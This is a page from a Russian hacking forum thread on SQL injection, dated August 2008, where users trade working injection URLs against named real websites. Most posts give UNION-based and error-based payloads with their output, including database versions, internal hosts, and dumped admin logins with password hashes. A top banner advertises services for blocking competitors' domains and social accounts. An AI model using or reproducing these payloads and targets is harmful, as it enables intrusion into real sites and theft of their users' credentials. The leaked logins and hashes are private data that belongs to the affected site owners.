Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 637 из 1242

637

Опции темы

Поиск в этой теме

Опции просмотра

#6361

17.08.2008, 12:16

Fugitif

Постоянный

Регистрация: 23.09.2007

Сообщений: 416

Провел на форуме:
1781065

Репутация: 869

Код:

http://www.espacejavascript.com/script.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4/*

Цитата:

5.0.44-log:espaceja:espaceja@10.0.75.154

#6362

17.08.2008, 12:30

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Вот такой вот БОЛТ ))

Цитата:

http://bolt.lakeheadu.ca/~educate/wp/?pg=-47

Цитата:

Version: 4.1.21-standard-log
Dbname: education
Username: educate@localhost
news
phpbb_users линка: forum/
courses

Цитата:

http://www.iqc.ca/activities/courses/course_details_new.php?id=-51

Version: 5.0.18-nt
Dbname: iqc
Username: web@iqc4.math.uwaterloo.ca

ничего про юзеров((

==============================
PR-4

Цитата:

http://www.nakuspmusicfest.ca/news.php?id=65

фест какой то..виндовый хостинг.

Username:nakusp@localhost
Database:nakusp
Version:5.0.45-community-nt

Последний раз редактировалось $n@ke; 17.08.2008 в 13:45.. Причина: add_again

#6363

17.08.2008, 13:46

Shaitan-Devil

Участник форума

Регистрация: 15.08.2008

Сообщений: 167

Провел на форуме:
3009843

Репутация: 204

Довел инъекцию Fugitif.

Код:

 http://www.espacejavascript.com/script.php?id=-1' 
http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,version(),5,6,/*
http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,table_name,5,6
+from+infomation_schema.tables/*

Выводятся все таблицы,я выбрал site_admins_annu. Колнки: login,pass.
login: G1Script
pass:931af583573227f0220bc568c65ce104

#6364

17.08.2008, 17:53

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,email,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+users/*
ничего полезного кроме мыл не нашел

#6365

17.08.2008, 18:50

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Отправить сообщение для Dimi4 с помощью ICQ

ALL4HOSTING

http://www.all4hosting.ru/

таблы

Цитата:

Сообщение от Dimi4

http://www.all4hosting.ru/index.asp?idSort=6+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT +IN+('Content','D99_CMD','D99_Tmp','dtproperties', 'foob','forum_data','forum_mails','forum_theme','f orum_title','idClient','kill_kk','Links','Log','Mailer','Menu','Meta',' MetaLinks','News','property','sysconstraints','sys segments','t','t_jiaozhu','te222','TreeList_Tmp'))--

Более менее интересной показалась idClient

Но там всего два юзера, и то западло какоето:

Цитата:

http://www.all4hosting.ru/index.asp?idSort=6+or+1=(SELECT+TOP+1+COLUMN_NAME+ FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=' idClient'+AND+COLUMN_NAME+NOT+IN+('idClient','logi n','pass','ip'))--

Цитата:

http://www.all4hosting.ru/index.asp?idSort=6+or+1=(SELECT+TOP+1+login+FROM+i dClient)--

system_user:allforhosting
@@version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name():allforhosting

__________________

BlackHat.

MoDL

Последний раз редактировалось Dimi4; 24.08.2008 в 22:42..

#6366

17.08.2008, 19:23

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

http://www.davisvisitor.com/sub_hotels.php?id=9&city=-1+union+select+1,version(),3,4,5,6,7,8/*

version 4.0.16

#6367

17.08.2008, 19:34

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

http://www.michaelpollan.com/article.php?id=-87+union+select+1,version(),database(),4,5,6,user( ),8,9,0/*
version: MYSQL 4.1.22-standard
database: pollan_articles
user: pollan_article@localhost

Sql Inj

#6368

17.08.2008, 20:30

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

Sql Inj

Palit.biz

Цитата:

http://www.palit.biz/main/vgapro.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,version()+limit+1,1/*

Combined.biz

Цитата:

http://www.combined.biz/portfolio_details.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4 ,5,6+from+mysql.user--

Plusline.org

Цитата:

http://www.plusline.org/article.php?id=99999+union+select+unhex(hex(versio n()))/*

Talk.biz

Цитата:

http://www.talk.biz/talk/cities.php?id=-1'+union+select+1,2,3,version(),5,6/*

Cyberthing.net

Цитата:

http://www.cyberthing.net/video-play.php?id=-1+union+select+1,concat_ws(0x3a,table_name),3,4,5, 6,7+from+information_schema.tables

Interprice.biz

Цитата:

http://interprice.biz/pricelist.php?cat=1&fcountry=&fregion=&fcity=&fupd ated=0&ftitle=99999999999%27+union+select+1,unhex( hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25/*

Ransomes-jacobsen.biz

Цитата:

http://www.ransomes-jacobsen.biz/rjl_website/product_details.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16/*

Talant.biz

Цитата:

http://www.talant.biz/news.php?id=-1'+union+select+1,2,3,unhex(hex(version())),5,6,7, 8,9,10/*

3 ver. by vital & jokester

Цитата:

http://www.saldovo-divadlo.cz/page.php?id=4+and+substring(version(),1,1)=3/*
http://www.host.ie/testimonials.php?id=8+and+substring(version(),1,1) =3/*
http://www.places.ge/GEO/sightseeings.php?id=2'+and+substring(version(),1,1 )=3/*

Последний раз редактировалось sabe; 17.08.2008 в 20:37..

#6369

18.08.2008, 01:30

mister

Познающий

Регистрация: 24.07.2007

Сообщений: 31

Провел на форуме:
1417840

Репутация: 35

Отправить сообщение для mister с помощью ICQ

Код:

http://news.udaff.com

POST-инъект

Код:

http://news.udaff.com/index.php
cat=korresp&korrname='+union+select+1,concat_ws(0x3a,login,password),3+from+USERS+limit+0,1/*

inzzz:6af0088fc7c444ab185664fc4625b44a:bugaga

#6370

18.08.2008, 02:18

ЛифчиС5СВ

Постоянный

Регистрация: 09.03.2007

Сообщений: 323

Провел на форуме:
1552920

Репутация: 369

Немного о вине =)

Код:

http://www.dionysos-mereni.com/news.php?id=220+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+from+admintable/*

Табличку не подобрал =)

Страница 637 из 1242

637

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход